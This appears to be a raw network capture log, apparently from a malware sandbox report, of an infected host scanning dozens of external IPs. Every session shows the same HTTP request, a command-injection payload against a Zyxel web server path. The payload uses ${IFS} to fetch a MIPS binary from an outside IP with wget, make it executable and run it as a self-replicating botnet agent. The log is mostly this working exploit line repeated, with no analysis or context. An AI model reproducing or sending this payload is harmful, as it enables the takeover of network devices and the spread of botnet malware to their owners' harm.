                                      Jan 14, 2024 15:50:35.021323919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1328192.168.2.1443538159.177.227.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021358967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1329192.168.2.145099684.59.33.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021405935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1330192.168.2.1456740149.121.97.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021430969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1331192.168.2.143952423.132.117.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021480083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1332192.168.2.143547840.246.104.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021539927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1333192.168.2.1455946210.83.93.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021562099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1334192.168.2.145248212.43.159.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021590948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1335192.168.2.145707813.157.8.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021646976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1336192.168.2.1444218162.120.177.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021708965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1337192.168.2.1435370125.238.61.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021749973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1338192.168.2.143622087.110.73.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021776915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1339192.168.2.1452458159.116.14.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021825075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1340192.168.2.1453542187.93.116.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021857023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1341192.168.2.144999099.160.55.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021898985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1342192.168.2.1436972159.84.32.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021945000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1343192.168.2.145458657.141.186.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021990061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1344192.168.2.145263417.32.81.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022015095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1345192.168.2.1449356143.209.219.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022058964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1346192.168.2.1445668113.96.233.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022109985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1347192.168.2.1457068101.82.64.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022145033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1348192.168.2.1460168110.215.148.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022195101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1349192.168.2.144077649.103.121.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022244930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1350192.168.2.145360282.248.154.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022269011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1351192.168.2.14591349.153.222.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022324085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1352192.168.2.143545038.213.14.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022345066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1353192.168.2.1459582157.50.38.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022367954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1354192.168.2.143735845.195.170.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022407055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1355192.168.2.144122887.252.212.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022458076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1356192.168.2.1434316187.148.25.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022505999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1357192.168.2.143750083.71.140.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022536993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1358192.168.2.1454830169.219.169.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022562981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1359192.168.2.145811267.177.84.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022587061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1360192.168.2.1438400101.213.237.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022664070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1361192.168.2.1451818188.176.72.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022717953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1362192.168.2.144908023.189.151.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022758961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1363192.168.2.1451386181.43.40.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022785902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1364192.168.2.145658013.200.157.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022806883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1365192.168.2.1440042191.188.97.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022872925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1366192.168.2.144614825.157.221.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022893906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1367192.168.2.1434768177.242.244.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022959948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1368192.168.2.146080073.143.91.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.022998095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1369192.168.2.143703475.220.246.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023022890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1370192.168.2.14532785.141.124.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023070097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1371192.168.2.143284673.223.151.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023096085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1372192.168.2.1457688154.53.82.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023144007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1373192.168.2.1455722117.46.217.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023190022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1374192.168.2.1438064157.112.182.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023228884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1375192.168.2.1449570118.121.27.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023267031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1376192.168.2.1442754211.193.215.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023320913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1377192.168.2.1457586108.101.72.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023367882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1378192.168.2.145550076.143.154.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023396969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1379192.168.2.1449972145.21.133.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023422956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1380192.168.2.1442598210.176.43.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023480892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1381192.168.2.1439630158.126.140.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023528099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1382192.168.2.145641077.116.245.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023565054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1383192.168.2.1452026158.92.126.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023629904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1384192.168.2.1455166133.183.147.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023658991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1385192.168.2.1440506119.153.146.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023715019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1386192.168.2.1449058179.7.127.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023757935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1387192.168.2.1435858164.40.49.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023791075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1388192.168.2.144099090.136.255.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023829937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1389192.168.2.1438894130.109.178.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.023855925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1390192.168.2.1449676179.193.48.25443
                                      TimestampBytes transferredDirectionData
